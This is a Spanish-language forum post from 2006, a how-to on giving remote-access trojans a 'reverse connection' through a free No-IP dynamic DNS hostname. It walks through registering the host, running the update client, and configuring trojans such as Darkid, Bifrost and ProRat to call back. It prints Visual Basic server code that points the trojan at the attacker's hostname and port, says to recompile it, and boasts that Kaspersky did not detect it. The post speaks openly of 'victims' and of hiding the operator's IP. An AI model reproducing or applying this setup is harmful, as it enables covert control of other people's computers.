MUSICONICA
Páginas: [1]   Ir Abajo
  Imprimir  
Autor Tema: CONEXION INVERSA(Como implementarla en troyanos)  (Leído 7417 veces)
0 Usuarios y 1 Visitante están viendo este tema.
Graphixx
Advertencias: 1
Desocupado
***
Desconectado Desconectado

Mensajes: 294


¤ WhiteHat ¤


Ver Perfil WWW
« en: 22 de Junio de 2006, 05:38:57 »

Hola a todos, como estoy usando Internet ADSL y el proveedor no me suministra una IP estática, debo encontrar un modo de obtener una…y esto lo vamos a lograr con el servicio de conexión inversa de No-ip.


Paso 1: Entra en www.no-ip.com y pulsa sobre FREE NO-IP. Una vez hecho esto le das al botón de abajo Sign up now!

Cuando te registres y valides tu cuenta, pulsando sobre el link que mandaran a tu cuenta de correo, logueate en la página poniendo tu email y password.

Paso 2: Pulsa sobre el botón ADD en el panel de la izquierda.
En hostname pon lo que quieras, por ejemplo: graphixx y elige algunos de los host's que ponen ahi, por ejemplo no-ip.org o sytes.net da igual cuál sea. En Host Tipe deja DNS (A) y deberá aparecer tu IP en IPadresses. El resto dejalo como está y dale a create host.
En un minuto o menos debería estar.

Paso 3: Ahora vete a downloads y descarga el DUCK para Windows 
Instala este programa, que tendrás que tener abierto siempre que uses un troyano con conexión inversa.
Al abrirlo te pedirá tu email y password (el mismo que tienes en no-ip.com).


Una vez te loggees en el programa deberá aparecerte algo como: graphixx.sites.net. Cliquea sobre la carita feliz hasta que se ponga así:  XD y entonces estarás conectado.


Paso 4: Ahora creamos un Server con un troyano de conexión inversa, Ej.: el Darkid o bifrost. En donde antes teníais que poner vuestra ip, ósea en DNS, pondréis el nombre del host (en este caso graphixx.sytes.net) y ya está.
Ahora cuando le envíes el Server a alguien conectará con no-ip y no-ip conectará contigo tengas la ip que tengas (siempre que tengas abierto el DUCK).

Las ventajas que le veo: 1º Podrán usar la conexión inversa los que tengan IP dinámica sin miedo a que les cambie la IP.
2º Puedes conectarte desde casa de un amigo (solo tienes que conectarte con el DUCK y las notificaciones llegarán a la ip de tu amigo) o puedes conectarte a las víctimas de algún amigo si te conectas en el DUCK con su email y pass.
3º Más anonimidad, creo que si el infectado hace un netstat, solo le sale la IP del host (Proxy) que usas, y no tu ip.
Os recuerdo que esto funciona tanto en módems como en routers, siempre y cuando los que tengan router abran el puerto que use ese troyano (el del bifrost es el 2000, y el del ProRat el 5110)
Pues nada, un saludo, y espero que les funcione a todos.
Bye

Interfaz del programa NO-IP

Observemos, donde dice ejemplo@gmail.com debe aparecer la cuenta de correo con la que te registraste.

Para cambiar de cuenta (Proxy), pulsas en el botón edit, o bien si la contraseña que suministraste no era valida.

Y podrás observar también donde dice:
Proxy 200.116.160.12, será la dirección IP que le saldrá a la victima si intenta localizarte.

Ahora miremos como configurar mi troyano para que trabaje con tu cuenta de
NO-IP.

Puedes encontrar mi troyano en el siguiente post:
Ver POST troyano Darkid 100% Colombiano

En este punto pido disculpas, ya que lo más adecuado seria implementar en el Cliente un editserver que genere automáticamente los servers con la IP especificada, estoy trabajando en eso…

Vamos a abrir el proyecto Server, y nos vamos al código fuente del form y allí ubicamos el evento form_load ( ), donde encontramos el siguiente código…

'conexion inversa
Dim ip As String
Dim ipftp As String
Dim port As Integer

'ip = "graphixx.sytes.net" <--- proxy
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
port = 314
WS.RemoteHost = ip
WS.RemotePort = port
tmr_inversa.interval = "3000"


Las líneas que aquí importan son:
ip = "graphixx.sytes.net"
ipftp = "graphixx.sytes.net"
Ya que es en estas donde le estamos indicando al Server hacia donde debe marcar para conectarse, en esta parte debes cambiar graphixx.sytes.net, por tu propia cuenta de NO-IP, o bien de algún otro servicio que desees utilizar.

También resaltare en esta ocasión el puerto:
Port = 314, ya que si deseas cambiarlo eres libre de hacerlo pero recuerda, estamos trabajando sobre el Server, si lo cambias aquí también debes cambiarlo en el Cliente.

Y listo una vez hallas configurado el IP, solo queda volver a compilar el proyecto, te vas a Archivo/Generar Darkid.exe, suerte y que lo disfrutes…

Al momento de redactar este manual era indetectable este método por el Kapersky, no lo probé sobre otros antivirus.

Hasta una próxima entrega…
Graphixx.
« Última modificación: 01 de Febrero de 2007, 02:05:23 por Graphixx » En línea
Graphixx
Advertencias: 1
Desocupado
***
Desconectado Desconectado

Mensajes: 294


¤ WhiteHat ¤


Ver Perfil WWW
« Respuesta #1 en: 01 de Febrero de 2007, 02:05:36 »

Post Reloaded.
En línea
Páginas: [1]   Ir Arriba
  Imprimir  
 
Ir a:  

Modify by RPM.
Página creada en 0.159 segundos con 19 queries.